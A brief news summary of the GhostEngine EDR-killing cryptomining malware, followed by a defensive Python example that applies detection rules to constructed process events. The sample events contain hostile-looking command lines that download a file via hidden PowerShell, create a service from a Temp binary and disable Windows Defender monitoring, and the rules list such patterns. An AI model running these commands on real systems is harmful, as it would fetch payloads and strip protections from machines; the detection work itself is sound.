'GhostEngine' is a novel EDR-killing malware that abuses vulnerable kernel drivers to disable security defenses so that it can evade detection. Also tracked as 'Hidden Shovel,' it is deployed by an intrusion set known as 'REF4578', which uses GhostEngine to shut down EDR agents, establish persistence, install a backdoor, and run a cryptominer.

GhostEngine malware targets vulnerable drivers to disable EDR solutions for stealth

The goal of the intrusion is to get past the security controls of corporate networks and mine cryptocurrency unnoticed. The attackers load vulnerable signed drivers and use them to terminate EDR agents, so researchers recommend detecting the earlier stages of the attack instead: suspicious PowerShell execution and unusual privilege use are the signals to look for. The specific detection rules cover PowerShell downloads, service control launched from a script interpreter, and tampering with Windows Defender.
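To make the three recommended detections concrete, here is an added example (not code from the article or from the researchers who published the rules) that runs simple process-creation rules over a handful of constructed Sysmon-style events. The field names, the sample command lines and the regular expressions are my own approximations of the behaviours named above, not the vendors' published rule logic, and would need tuning against real telemetry.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation events in a Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://example.invalid/a.png','C:\\Windows\\Temp\\a.png')\""},
    {"id": 2, "image": r"C:\Windows\System32\sc.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "sc.exe create ExampleSvc binPath= C:\\Windows\\Temp\\svc.exe start= auto"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 4, "image": r"C:\Windows\System32\sc.exe",          # benign: sc.exe from cmd, query only
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "sc.exe query wuauserv"},
    {"id": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign script
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

SCRIPT_INTERPRETERS = r"(?i)\\(powershell|pwsh|wscript|cscript|mshta)\.exe$"


@dataclass(frozen=True)
class Rule:
    """One process-creation rule: every listed pattern must match its field."""
    name: str
    image: str                     # regex on the created process image path
    command_line: str              # regex on the command line
    parent_image: Optional[str] = None  # optional regex on the parent process image

    def matches(self, event: dict) -> bool:
        if not re.search(self.image, event["image"]):
            return False
        if self.parent_image and not re.search(self.parent_image, event["parent_image"]):
            return False
        return re.search(self.command_line, event["command_line"]) is not None


# Hypothetical rules approximating the three detections named in the article.
RULES = [
    # PowerShell used to fetch a payload from the network.
    Rule(name="powershell_download",
         image=r"(?i)\\(powershell|pwsh)\.exe$",
         command_line=r"(?i)(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|"
                      r"Net\.WebClient|Start-BitsTransfer|Invoke-RestMethod)"),
    # sc.exe changing service state/config, spawned by a script interpreter rather than a shell.
    Rule(name="service_control_via_script_interpreter",
         image=r"(?i)\\sc\.exe$",
         parent_image=SCRIPT_INTERPRETERS,
         command_line=r"(?i)\b(create|config|stop|start|delete|failure)\b"),
    # Defender being weakened via PowerShell cmdlets or the registry.
    Rule(name="windows_defender_tampering",
         image=r"(?i)\\(powershell|pwsh|reg)\.exe$",
         command_line=r"(?i)(Set-MpPreference\s+-Disable|Add-MpPreference\s+-Exclusion|"
                      r"Windows Defender.*DisableAntiSpyware)"),
]


def evaluate(events: List[dict], rules: List[Rule] = RULES) -> List[Tuple[str, int]]:
    """Return (rule_name, event_id) for every rule hit, in event order."""
    hits = []
    for event in events:
        for rule in rules:
            if rule.matches(event):
                hits.append((rule.name, event["id"]))
    return hits


if __name__ == "__main__":
    for rule_name, event_id in evaluate(SAMPLE_EVENTS):
        print(f"{rule_name}: event {event_id}")
```

Run against the constructed events, the three malicious entries each trigger exactly one rule and the two benign ones trigger none; the parent-process constraint on the service-control rule is what keeps an administrator's `sc.exe query` from a cmd prompt out of the results.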
https://www.darkreading.com/cyberattacks-data-breaches/novel-edr-killing-ghostengine-malware-stealth